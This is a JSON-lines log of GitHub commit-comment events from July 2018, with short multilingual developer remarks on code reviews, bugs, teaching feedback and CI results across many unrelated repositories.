{"id":"7999937032","type":"CommitCommentEvent","actor":{"login":"Xottab-DUTY"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29791792,"position":null,"line":null,"path":null,"commit_id":"6fea6c4fec17a36939e657b4acabcb534c3a902a","created_at":"2018-07-22T09:41:40Z","updated_at":"2018-07-22T09:41:40Z","author_association":"CONTRIBUTOR","body":"Я как-то Окси запустил, а окно движка не было активным..\r\nА там стоял вызов сворачивания окна через GetActiveWindow и, одновременно, GetInactiveWindow.\r\nПричём через цикл до тех пор пока функция не вернёт false..\r\nВ итоге мне Окси свернул сам себя, все окна, диспетчер задач.. А заодно и шею проводнику свернул. :D "}},"created_at":"2018-07-22T09:41:40Z"}
{"id":"7999938314","type":"CommitCommentEvent","actor":{"login":"Shiming-shi"},"repo":{"name":"Shiming-shi/1"},"payload":{"comment":{"id":29791796,"position":null,"line":null,"path":null,"commit_id":"e9df20be284211bab11e537bd426a069fb939993","created_at":"2018-07-22T09:42:45Z","updated_at":"2018-07-22T09:42:45Z","author_association":"OWNER","body":"223"}},"created_at":"2018-07-22T09:42:45Z"}
{"id":"7999938503","type":"CommitCommentEvent","actor":{"login":"Shiming-shi"},"repo":{"name":"Shiming-shi/1"},"payload":{"comment":{"id":29791797,"position":null,"line":null,"path":null,"commit_id":"e9df20be284211bab11e537bd426a069fb939993","created_at":"2018-07-22T09:42:56Z","updated_at":"2018-07-22T09:42:56Z","author_association":"OWNER","body":"22"}},"created_at":"2018-07-22T09:42:56Z"}
{"id":"7999940863","type":"CommitCommentEvent","actor":{"login":"elmendalerenda"},"repo":{"name":"VLCTechHub/VLCTechHub-api"},"payload":{"comment":{"id":29791889,"position":13,"line":11,"path":"config/base.rb","commit_id":"bc5a9605f4162c52bb887169b45e58332c7d47f9","created_at":"2018-07-22T09:44:56Z","updated_at":"2018-07-22T09:44:56Z","author_association":"CONTRIBUTOR","body":"done"}},"created_at":"2018-07-22T09:44:56Z"}
{"id":"7999941279","type":"CommitCommentEvent","actor":{"login":"jarengus"},"repo":{"name":"jarengus/EU4-FIESTA"},"payload":{"comment":{"id":29791893,"position":null,"line":null,"path":null,"commit_id":"3d3e5de5c32e2af154fe3688847c818101b6658b","created_at":"2018-07-22T09:45:16Z","updated_at":"2018-07-22T09:45:16Z","author_association":"OWNER","body":"Well playes"}},"created_at":"2018-07-22T09:45:16Z"}
{"id":"7999944038","type":"CommitCommentEvent","actor":{"login":"vit9696"},"repo":{"name":"acidanthera/WhateverGreen"},"payload":{"comment":{"id":29791898,"position":null,"line":null,"path":null,"commit_id":"dd5bc7d6cf8b8482cc5477f2c0d422884f5acea2","created_at":"2018-07-22T09:47:40Z","updated_at":"2018-07-22T09:47:40Z","author_association":"COLLABORATOR","body":"HDMI is implemented in AppleALC, WhateverGreen only performs a connector patch."}},"created_at":"2018-07-22T09:47:40Z"}
{"id":"7999944990","type":"CommitCommentEvent","actor":{"login":"kettanaito"},"repo":{"name":"Vidlec/Monitor"},"payload":{"comment":{"id":29791900,"position":8,"line":8,"path":"src/server/workers/database/dbHandler.js","commit_id":"4ec7687dd22f93ff566d26bde0e4c8a2a6348c4c","created_at":"2018-07-22T09:48:30Z","updated_at":"2018-07-22T09:48:30Z","author_association":"COLLABORATOR","body":"Don't you think operating `connector` variable in such a mutable way is reliable?\r\n\r\n```js\r\nimport * as connectors from '@services/connectors'\r\n\r\nexport default function createDbHandler(name) {\r\n  // there is no substantial benefit of having a dynamic import here\r\n  // also, handle the case when there is no connector found for the given name\r\n  const connector = connectors[name]\r\n\r\n  if (name === 'mongo') {\r\n    // beware that this returns a promise\r\n    mongoose.connect('...') \r\n  }\r\n\r\n  // in the end, return a handler function\r\n  return (args) => {\r\n    const { type } = args\r\n\r\n    switch (type) {\r\n      case actions.ALERT_ADD: {\r\n        // don't delegate argument assigning logic here,\r\n        // prefer passing given args as-is to the handler function\r\n        return connector.deduplicateAlert(args)\r\n      }\r\n \r\n      default:\r\n        break;\r\n    }\r\n  }\r\n}\r\n```"}},"created_at":"2018-07-22T09:48:30Z"}
{"id":"7999948958","type":"CommitCommentEvent","actor":{"login":"PureDark"},"repo":{"name":"nike4613/BeatSaberButtonMapper"},"payload":{"comment":{"id":29791902,"position":null,"line":null,"path":null,"commit_id":"086ee1830e0a2a74c1ca1ef77ada371e63d82140","created_at":"2018-07-22T09:52:18Z","updated_at":"2018-07-22T09:52:18Z","author_association":"NONE","body":"No, it doesn't. Using Modprefs class directly without checking the existence of the UserData would cause issue. \r\nI have experience runing into that before."}},"created_at":"2018-07-22T09:52:18Z"}
{"id":"7999950648","type":"CommitCommentEvent","actor":{"login":"talamortis"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29791908,"position":null,"line":null,"path":null,"commit_id":"bdbdc8030ac75f530595377a8c8fc044e36d975e","created_at":"2018-07-22T09:53:54Z","updated_at":"2018-07-22T09:53:54Z","author_association":"MEMBER","body":"@jameyboor - Not to be rude or anything mate but i was working on more than 1 thing last night it was prob something i just missed off.  so if i missed something off or anything feel free to make a PR to CONTRIBUTE and fix it."}},"created_at":"2018-07-22T09:53:54Z"}
{"id":"7999952082","type":"CommitCommentEvent","actor":{"login":"pengluyaoyao"},"repo":{"name":"pengluyaoyao/income_prediction"},"payload":{"comment":{"id":29791913,"position":null,"line":null,"path":null,"commit_id":"22563859586b7ac1ab4199f998a5424612808cbe","created_at":"2018-07-22T09:55:16Z","updated_at":"2018-07-22T09:55:16Z","author_association":"OWNER","body":"This is plot script for challenge question #3 in data incubator"}},"created_at":"2018-07-22T09:55:16Z"}
{"id":"7999952726","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18001-ikeshiro/programming-term2"},"payload":{"comment":{"id":29791915,"position":null,"line":null,"path":null,"commit_id":"9d7c1284ea38ccd2822e2a551da968eaa472e029","created_at":"2018-07-22T09:55:49Z","updated_at":"2018-07-22T09:55:49Z","author_association":"NONE","body":"うーん、まず「メインメニューを承りました」を表示する部分ですが、これはただ表示して欲しいので、inputを使う部分でなく、printを使う部分です。\r\n\r\ninputは「メッセージを表示したあと、何か相手に入力を求める」場合に使うと覚えましょう。\r\n\r\nまた、mainは大抵のプログラミング言語で使うキーワードと重複してしまう可能性があるので、これを変数名に使うのはあまり良くないです。\r\nmain_menuとかmain_menusとかにすると良いと思います。\r\n\r\n今回の課題を達成していくポイントですが、以下の順番で達成していきましょう。\r\n\r\n1.一旦キャンセルは置いといて、入力したメインメニューが存在しているかどうか。\r\n存在していたら、その金額を表示してみる。存在していなければ、存在しない旨のメッセージを表示してみる。\r\nヒント： 存在するかどうかは (判断したいキー名) in (辞書型) とコーディングします。講義中の解説でも言いましたし、教科書にも書いているので、一度振り返ってみましょう。\r\n\r\n2. 1が出来たら「キーボードから未入力あるいは\"q\"が押された」以外の場合に1のコードを組み込みましょう。\r\n「キーボードから未入力あるいは\"q\"が押された」の条件は17行目で実装できていますね。\r\n1のコードを20行目以降に反映するイメージです。\r\n\r\n2.まででメインメニューだけの処理が出来ましたね。最低ここまで行きましょう。\r\n以降ちょっと難しいかと思います。ここからはチャレンジですね。\r\n参考までにヒントです。\r\n\r\n3.オプションの注文は複数回繰り返される可能性があります。while True:を継続条件にして、\"\"か\"q\"が押されたらbreakしてあげると良いと思います。\r\nえっと、ここからは文で書くと長いので、ホワイトボードに先日書いたフローチャートを画像ファイルにしてYammerで共有しようと思います。(僕にその余裕があれば…)"}},"created_at":"2018-07-22T09:55:49Z"}
{"id":"7999953545","type":"CommitCommentEvent","actor":{"login":"esukorion"},"repo":{"name":"esukorion/mao-seminar"},"payload":{"comment":{"id":29791916,"position":null,"line":null,"path":null,"commit_id":"396dc80acf1d48e0982d2ed38fed5f8a2b3bb9c1","created_at":"2018-07-22T09:56:37Z","updated_at":"2018-07-22T09:56:37Z","author_association":"OWNER","body":"README.mdにメンバー一覧を追加"}},"created_at":"2018-07-22T09:56:37Z"}
{"id":"7999954977","type":"CommitCommentEvent","actor":{"login":"winlinvip"},"repo":{"name":"ossrs/srs"},"payload":{"comment":{"id":29791919,"position":null,"line":null,"path":null,"commit_id":"84f81983aa609d2027e290c808280428a4e69f0e","created_at":"2018-07-22T09:58:00Z","updated_at":"2018-07-22T09:58:00Z","author_association":"MEMBER","body":"https://github.com/ossrs/srs/issues/917#issuecomment-406854293"}},"created_at":"2018-07-22T09:58:00Z"}
{"id":"8001095521","type":"CommitCommentEvent","actor":{"login":"fragsman"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29794714,"position":12,"line":15,"path":"Ratatoullie/src/main/webapp/WEB-INF/pages/restaurantForm.jsp","commit_id":"3d293fb741659d16e2ed228093be9aa4fabeb3ae","created_at":"2018-07-23T00:01:08Z","updated_at":"2018-07-23T00:01:08Z","author_association":"COLLABORATOR","body":"Esto debera ser path=\"category\" pero me tira error, no entiendo. Incluso si está comentado!!!! Es como que lee lo que está comentado y falla, por eso puse path=\"categories\"."}},"created_at":"2018-07-23T00:01:08Z"}
{"id":"8001096760","type":"CommitCommentEvent","actor":{"login":"fragsman"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29794715,"position":35,"line":36,"path":"Ratatoullie/src/main/webapp/WEB-INF/pages/restaurantForm.jsp","commit_id":"3d293fb741659d16e2ed228093be9aa4fabeb3ae","created_at":"2018-07-23T00:01:58Z","updated_at":"2018-07-23T00:01:58Z","author_association":"COLLABORATOR","body":"Eso imprime el toString del objeto Category. Si pongo categories.name falla. No entiendo por que.\r\n@Tino037 @carolina46 "}},"created_at":"2018-07-23T00:01:58Z"}
{"id":"8001097284","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29794716,"position":null,"line":null,"path":null,"commit_id":"37b726982d0cc8af21705f6acf1a76f3a0f4a6a1","created_at":"2018-07-23T00:02:22Z","updated_at":"2018-07-23T00:02:22Z","author_association":"MEMBER","body":"@oblakeerickson I think we need to add a spec."}},"created_at":"2018-07-23T00:02:22Z"}
{"id":"8001097799","type":"CommitCommentEvent","actor":{"login":"SadError256"},"repo":{"name":"TermGet/TermGet"},"payload":{"comment":{"id":29794717,"position":null,"line":null,"path":null,"commit_id":"2258265c69c4e05122cf73f60c1bd6eee839c439","created_at":"2018-07-23T00:02:43Z","updated_at":"2018-07-23T00:02:43Z","author_association":"CONTRIBUTOR","body":"1. I don't think this will work as python does not do a good job with cd support.\r\n2. Couldn't we use more official API's instead of just using os.system? That's a little bit of cheating..."}},"created_at":"2018-07-23T00:02:43Z"}
{"id":"8001098864","type":"CommitCommentEvent","actor":{"login":"tinapleez"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29794721,"position":null,"line":null,"path":null,"commit_id":"81fe10a47364d2484770d95498595dd8f71d3b24","created_at":"2018-07-23T00:03:31Z","updated_at":"2018-07-23T00:03:31Z","author_association":"NONE","body":"Cool. I figured that, since your post is dated over a week ago. I thought I'd put the comment up for future confused students, because I also was thrown a little bit by the abruptness at the end of the lesson."}},"created_at":"2018-07-23T00:03:31Z"}
{"id":"8001100730","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_CM"},"payload":{"comment":{"id":29794724,"position":null,"line":null,"path":null,"commit_id":"c7e02fecd0467954d9cb0110b569103825990b6b","created_at":"2018-07-23T00:04:57Z","updated_at":"2018-07-23T00:04:57Z","author_association":"NONE","body":"I don't get any error message, it just doesn't start. Setting Daemon=0 is ok, only with Daemon=1 it happens. Also reverting this commit works ok."}},"created_at":"2018-07-23T00:04:57Z"}
{"id":"8001106350","type":"CommitCommentEvent","actor":{"login":"Janmm14"},"repo":{"name":"SpigotMC/BungeeCord"},"payload":{"comment":{"id":29794729,"position":8,"line":396,"path":"proxy/src/main/java/net/md_5/bungee/connection/DownstreamBridge.java","commit_id":"95ed7a5775e956e00062a3bd6e00a3c4edbf4d70","created_at":"2018-07-23T00:08:57Z","updated_at":"2018-07-23T00:08:57Z","author_association":"CONTRIBUTOR","body":"Unfortunaly other BungeeCord plugin message API design doesn't care about this too."}},"created_at":"2018-07-23T00:08:57Z"}
{"id":"8001107846","type":"CommitCommentEvent","actor":{"login":"juribeparada"},"repo":{"name":"juribeparada/MMDVM_CM"},"payload":{"comment":{"id":29794731,"position":null,"line":null,"path":null,"commit_id":"c7e02fecd0467954d9cb0110b569103825990b6b","created_at":"2018-07-23T00:10:06Z","updated_at":"2018-07-23T00:10:06Z","author_association":"OWNER","body":"Yes, I know, but did you try recently with my last update?"}},"created_at":"2018-07-23T00:10:06Z"}
{"id":"8001108873","type":"CommitCommentEvent","actor":{"login":"DCurrent"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29794734,"position":null,"line":null,"path":null,"commit_id":"e8b8d1cefdf9499c90b3a91354f8ea69bf9d083a","created_at":"2018-07-23T00:10:51Z","updated_at":"2018-07-23T00:10:51Z","author_association":"OWNER","body":"Looks good @whitedragon0000 . The vs. style mod authors will love it."}},"created_at":"2018-07-23T00:10:51Z"}
{"id":"8001110597","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_CM"},"payload":{"comment":{"id":29794737,"position":null,"line":null,"path":null,"commit_id":"c7e02fecd0467954d9cb0110b569103825990b6b","created_at":"2018-07-23T00:12:08Z","updated_at":"2018-07-23T00:12:08Z","author_association":"NONE","body":"ah, sorry no, didn't notice you changed it again will try it."}},"created_at":"2018-07-23T00:12:08Z"}
{"id":"8001114212","type":"CommitCommentEvent","actor":{"login":"dbaldan"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29794738,"position":null,"line":null,"path":null,"commit_id":"e8b8d1cefdf9499c90b3a91354f8ea69bf9d083a","created_at":"2018-07-23T00:14:34Z","updated_at":"2018-07-23T00:14:34Z","author_association":"NONE","body":"Please, tell me the push is not the default behaviour, instead you need to turn it on."}},"created_at":"2018-07-23T00:14:34Z"}
{"id":"8001114645","type":"CommitCommentEvent","actor":{"login":"MCamp859"},"repo":{"name":"MCamp859/clear-linux-documentation"},"payload":{"comment":{"id":29794740,"position":4,"line":52,"path":"source/clear-linux/tutorials/kata_migration.rst","commit_id":"97d04158e444be80b3739082b5fc74a6656abac3","created_at":"2018-07-23T00:14:51Z","updated_at":"2018-07-23T00:14:51Z","author_association":"OWNER","body":"@mythi, I agree that we don't want to duplicate info. I also think that the first paragraph about why users need to migrate may be relevant (unless it is old news that Clear Containers is deprecated?). Suggest deleting from line 10 to the end, and add a pointer to the other tutorial. Then move some of the details about manually migrating config files. What do you think?"}},"created_at":"2018-07-23T00:14:51Z"}
{"id":"8001116118","type":"CommitCommentEvent","actor":{"login":"MCamp859"},"repo":{"name":"MCamp859/clear-linux-documentation"},"payload":{"comment":{"id":29794747,"position":102,"line":102,"path":"source/clear-linux/tutorials/kata.rst","commit_id":"97d04158e444be80b3739082b5fc74a6656abac3","created_at":"2018-07-23T00:15:41Z","updated_at":"2018-07-23T00:15:41Z","author_association":"OWNER","body":"OK, I will replace text in lines 41-46 with this text."}},"created_at":"2018-07-23T00:15:41Z"}
{"id":"8001118761","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_CM"},"payload":{"comment":{"id":29794749,"position":null,"line":null,"path":null,"commit_id":"c7e02fecd0467954d9cb0110b569103825990b6b","created_at":"2018-07-23T00:17:30Z","updated_at":"2018-07-23T00:17:30Z","author_association":"NONE","body":"It's ok now :)"}},"created_at":"2018-07-23T00:17:30Z"}
{"id":"8001119563","type":"CommitCommentEvent","actor":{"login":"villamarinella"},"repo":{"name":"eroticsoup/xhamster"},"payload":{"comment":{"id":29794752,"position":null,"line":null,"path":null,"commit_id":"7084302fe6faab7058d50375334930dd7759e107","created_at":"2018-07-23T00:18:05Z","updated_at":"2018-07-23T00:18:05Z","author_association":"NONE","body":"no info which Python is used?\r\nBULLSHIT"}},"created_at":"2018-07-23T00:18:05Z"}
{"id":"8001120323","type":"CommitCommentEvent","actor":{"login":"endgame"},"repo":{"name":"karun012/doctest-discover"},"payload":{"comment":{"id":29794755,"position":2,"line":2,"path":"config.json","commit_id":"20a88a6a1e9ca04bde4af7a60979b541d72522ba","created_at":"2018-07-23T00:18:36Z","updated_at":"2018-07-23T00:18:36Z","author_association":"NONE","body":"Is it valid JSON to not quote the key?"}},"created_at":"2018-07-23T00:18:36Z"}
{"id":"8001122608","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29794762,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-23T00:20:18Z","updated_at":"2018-07-23T00:20:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T00:20:18Z"}
{"id":"8001123079","type":"CommitCommentEvent","actor":{"login":"TysonAndre"},"repo":{"name":"vimeo/psalm"},"payload":{"comment":{"id":29794763,"position":345,"line":11120,"path":"src/Psalm/CallMap.php","commit_id":"d3fc9a51e0519379a27c05318e5f6fd41d46f797","created_at":"2018-07-23T00:20:39Z","updated_at":"2018-07-23T00:20:39Z","author_association":"CONTRIBUTOR","body":"I created https://github.com/phan/PHPSignatures - It directly duplicates the files found in src/Phan/Language/Internal.\r\n\r\nThe most likely workflow will be to cherry-pick changes from forks of PHPSignatures into Phan's version, then pull those changes, as well as to push changes made to Phan's function signatures to PHPSignatures (disabling force pushes to make history tracking easier)\r\n\r\nDocumentation changes are expected to be much less frequent than signature changes, so Phan's documentation was preserved for convenience. This may be reconsidered later.\r\n\r\nhttps://github.com/phan/PHPSignatures was not designed to be added to composer -- All projects that I've seen have reasons to maintain their own dependencies."}},"created_at":"2018-07-23T00:20:39Z"}
{"id":"8001123677","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"SchizoDuckie/DuckieTV"},"payload":{"comment":{"id":29794766,"position":null,"line":null,"path":null,"commit_id":"3c606eade60c77b6762545dc7f509c5e46253dff","created_at":"2018-07-23T00:21:06Z","updated_at":"2018-07-23T00:21:06Z","author_association":"COLLABORATOR","body":"hide not hard lol"}},"created_at":"2018-07-23T00:21:06Z"}
{"id":"8001124116","type":"CommitCommentEvent","actor":{"login":"papaxris"},"repo":{"name":"SickRage/SickRage"},"payload":{"comment":{"id":29794768,"position":null,"line":null,"path":null,"commit_id":"4738c4deda67731429d99309ff9754e9cf9e913e","created_at":"2018-07-23T00:21:24Z","updated_at":"2018-07-23T00:21:24Z","author_association":"NONE","body":"Many Thanks for looking into the solution!  I'll be happy to test and report once released to Master Branch."}},"created_at":"2018-07-23T00:21:24Z"}
{"id":"8001135410","type":"CommitCommentEvent","actor":{"login":"miurahr"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29794797,"position":null,"line":null,"path":null,"commit_id":"76f3111b86f418851ad91f0ba339d671a6997fe2","created_at":"2018-07-23T00:29:27Z","updated_at":"2018-07-23T00:29:27Z","author_association":"CONTRIBUTOR","body":"#785 fixes an reported issue."}},"created_at":"2018-07-23T00:29:27Z"}
{"id":"8001136323","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29794799,"position":null,"line":null,"path":null,"commit_id":"8e2ffe89212cb1f96154cd2b66df9b70f7c8f4ac","created_at":"2018-07-23T00:30:07Z","updated_at":"2018-07-23T00:30:07Z","author_association":"OWNER","body":"Excellent!"}},"created_at":"2018-07-23T00:30:07Z"}
{"id":"8001136755","type":"CommitCommentEvent","actor":{"login":"jaccharrison"},"repo":{"name":"jaccharrison/PyLTSpice"},"payload":{"comment":{"id":29794803,"position":null,"line":null,"path":null,"commit_id":"a80f4b64e87ba1bcb998978adec78c74b55ff8d5","created_at":"2018-07-23T00:30:20Z","updated_at":"2018-07-23T00:30:20Z","author_association":"OWNER","body":"Nuno,\n\nThanks! It’s very satisfying to hear that you like the changes I made.\n\nIf you add me as a user, I’d be happy to push any additional fixes or improvements to your repo instead of to my fork. That’s totally your decision.\n\nJacob\n\n> On Jul 13, 2018, at 3:58 AM, nunobrum <notifications@github.com> wrote:\n> \n> Hi there,\n> Nice work. I'll merge your changes back to my repo.\n> I can add you as a user if you so wish. If you have any doubts, let me know.\n> \n> Best Regards,\n> Nuno\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/jaccharrison/PyLTSpice/commit/a80f4b64e87ba1bcb998978adec78c74b55ff8d5#commitcomment-29696804>, or mute the thread <https://github.com/notifications/unsubscribe-auth/APq43MlJeOwOMsCPpjd9P0-sJnNKTDDNks5uGGEtgaJpZM4VOihp>.\n> \n\n"}},"created_at":"2018-07-23T00:30:20Z"}
{"id":"8001138122","type":"CommitCommentEvent","actor":{"login":"olekgierczak"},"repo":{"name":"liyishuai/coq-http2"},"payload":{"comment":{"id":29794804,"position":94,"line":94,"path":"src/HPACK/HPACKTypes.v","commit_id":"88963344e21b9e62e2f23aa09b58b91437331936","created_at":"2018-07-23T00:31:08Z","updated_at":"2018-07-23T00:31:08Z","author_association":"COLLABORATOR","body":"Sorry, I forgot to link the relevant part of rfc. Here's the link for more reading:\r\nhttps://http2.github.io/http2-spec/compression.html#static.table.definition\r\nBut my understanding is it's a predetermined and shared set of encoded/decoded headers. "}},"created_at":"2018-07-23T00:31:08Z"}
{"id":"8001138905","type":"CommitCommentEvent","actor":{"login":"francischu"},"repo":{"name":"francischu/test2"},"payload":{"comment":{"id":29794805,"position":null,"line":null,"path":null,"commit_id":"d846fa0fe8eca086b4deac8d9b5df34d5f6613d2","created_at":"2018-07-23T00:31:39Z","updated_at":"2018-07-23T00:31:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [代辦事項1](https://trello.com/c/yxnWpDK1/1-%E4%BB%A3%E8%BE%A6%E4%BA%8B%E9%A0%851)"}},"created_at":"2018-07-23T00:31:39Z"}
{"id":"8001139119","type":"CommitCommentEvent","actor":{"login":"t-f-u-sys-co-jp"},"repo":{"name":"t-f-u-sys-co-jp/testrepo"},"payload":{"comment":{"id":29794806,"position":2,"line":2,"path":"test.txt","commit_id":"3f73ac8e4d4fec8b273830eaad7b6ceb6abc983a","created_at":"2018-07-23T00:31:46Z","updated_at":"2018-07-23T00:31:46Z","author_association":"OWNER","body":"#prtest\r\n`cccc`\r\n"}},"created_at":"2018-07-23T00:31:46Z"}
{"id":"8001140179","type":"CommitCommentEvent","actor":{"login":"francischu"},"repo":{"name":"francischu/test2"},"payload":{"comment":{"id":29794807,"position":null,"line":null,"path":null,"commit_id":"d846fa0fe8eca086b4deac8d9b5df34d5f6613d2","created_at":"2018-07-23T00:32:28Z","updated_at":"2018-07-23T00:32:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [代辦事項1](https://trello.com/c/yxnWpDK1/1-%E4%BB%A3%E8%BE%A6%E4%BA%8B%E9%A0%851)"}},"created_at":"2018-07-23T00:32:28Z"}
{"id":"8001140987","type":"CommitCommentEvent","actor":{"login":"francischu"},"repo":{"name":"francischu/test2"},"payload":{"comment":{"id":29794808,"position":null,"line":null,"path":null,"commit_id":"d846fa0fe8eca086b4deac8d9b5df34d5f6613d2","created_at":"2018-07-23T00:33:07Z","updated_at":"2018-07-23T00:33:07Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [代辦事項1](https://trello.com/c/yxnWpDK1/1-%E4%BB%A3%E8%BE%A6%E4%BA%8B%E9%A0%851)"}},"created_at":"2018-07-23T00:33:07Z"}
{"id":"8001143507","type":"CommitCommentEvent","actor":{"login":"Flanisch"},"repo":{"name":"BLCM/BLCMods"},"payload":{"comment":{"id":29794810,"position":null,"line":null,"path":null,"commit_id":"4d4ad13d4a1c22aca4547ee1a6c25a0a808030c0","created_at":"2018-07-23T00:34:54Z","updated_at":"2018-07-23T00:34:54Z","author_association":"NONE","body":"Hey,\r\n\r\nI did some testing with those values and think that they are somewhat a more configurable version of _MaxParticleResize_ in _WillowEngine.ini_. This value is to my knowledge a 32bit integer. Out of the box it is set to 0, which is handled as the maximum value (2³²-1). This of course causes CPUs to choke on that many particles rendered.\r\n\r\nI had some success setting that number to a tenth of its maximum value, giving me great physx effects as well as a somewhat okayish performance. I don't know if any of that is true, but running some benchmarks with the integrated physx benchmark kind of proved that it is at least a thought into the right direction.\r\n\r\nMaybe the values in your fix are handled as a 32bit integer as well. So it would make sense to increase them by a lot. Maybe the values you provided override _MaxParticleResize_ and give you a bit more freedom of changing the amount of particles. It could also be, that the values you provide are overruled by this particular ini tweak if they exceed the number specified, so _MaxParticleResize=0_ should be set for testing.\r\n\r\nI have a few questions left:\r\n- There are MaxParticles1 and MaxParticles2. Are they just two different types of particles?\r\n- You used MaxPartcles1 twice for Grass and Sparks. Is that intended?\r\n\r\nI really like, that someone is trying a new take on the broken PhysX on BL2. This looks really promising. I don't know much about coding, but I am trying to provide any help I can, be it testing.\r\n\r\n-Flanisch"}},"created_at":"2018-07-23T00:34:54Z"}
{"id":"8001146198","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29794813,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-23T00:36:41Z","updated_at":"2018-07-23T00:36:41Z","author_association":"NONE","body":"noobpwnftw ryzens seem to start crashing at VLTC, at STC they never crash and at LTC crashrate is really low, like 3 games/50k @noobpwnftw"}},"created_at":"2018-07-23T00:36:41Z"}
{"id":"8001146483","type":"CommitCommentEvent","actor":{"login":"darktoes"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":29794814,"position":null,"line":null,"path":null,"commit_id":"047985163f48931ea69ff39025fc34840ed18afe","created_at":"2018-07-23T00:36:52Z","updated_at":"2018-07-23T00:36:52Z","author_association":"CONTRIBUTOR","body":"Forgot to mention, also added two new kinds of arrow."}},"created_at":"2018-07-23T00:36:52Z"}
{"id":"8001147603","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29794817,"position":null,"line":null,"path":null,"commit_id":"2947156b797e479488c53ffef9a6159ea2f65514","created_at":"2018-07-23T00:37:34Z","updated_at":"2018-07-23T00:37:34Z","author_association":"OWNER","body":"Thanks @Vizvezdenec for submitting a LTC on my behalf.  However, it's not quite correct (my fault, not yours).  I had pushed another commit to the same branch earlier, so it's now overload4^ vs. overload4^^, not overload4 vs overload4^."}},"created_at":"2018-07-23T00:37:34Z"}
{"id":"8001148148","type":"CommitCommentEvent","actor":{"login":"alkis"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29794818,"position":9,"line":9,"path":"time.h","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-23T00:37:57Z","updated_at":"2018-07-23T00:37:57Z","author_association":"NONE","body":"using Time = Clock::time_point;"}},"created_at":"2018-07-23T00:37:57Z"}
{"id":"8001149744","type":"CommitCommentEvent","actor":{"login":"jesusp87"},"repo":{"name":"jesusp87/jp-random-tests"},"payload":{"comment":{"id":29794820,"position":28,"line":27,"path":"code-review/steps.js","commit_id":"2b0dfb7e094a7ab2ee9535ee058d7100cf25700c","created_at":"2018-07-23T00:38:58Z","updated_at":"2018-07-23T00:38:58Z","author_association":"OWNER","body":"In other scenarios we use the methods 'waitForVisible' or 'isExisting'. Maybe here we should apply the same strategy to avoid 'pause'?"}},"created_at":"2018-07-23T00:38:58Z"}
{"id":"8001155851","type":"CommitCommentEvent","actor":{"login":"jinlongliuyy"},"repo":{"name":"jinlongliuyy/untitled1"},"payload":{"comment":{"id":29794830,"position":null,"line":null,"path":null,"commit_id":"bed64d7051f81ee055b6c0a29d4aa240347b7007","created_at":"2018-07-23T00:42:59Z","updated_at":"2018-07-23T00:42:59Z","author_association":"OWNER","body":"<!--这是一次测试，没有修改内容-->"}},"created_at":"2018-07-23T00:42:59Z"}
{"id":"8001156821","type":"CommitCommentEvent","actor":{"login":"buxstore"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29794834,"position":null,"line":null,"path":null,"commit_id":"c14d3fa6c837cdfef3360d62d4e6ea64da5c626b","created_at":"2018-07-23T00:43:38Z","updated_at":"2018-07-23T00:43:38Z","author_association":"NONE","body":"can't run"}},"created_at":"2018-07-23T00:43:38Z"}
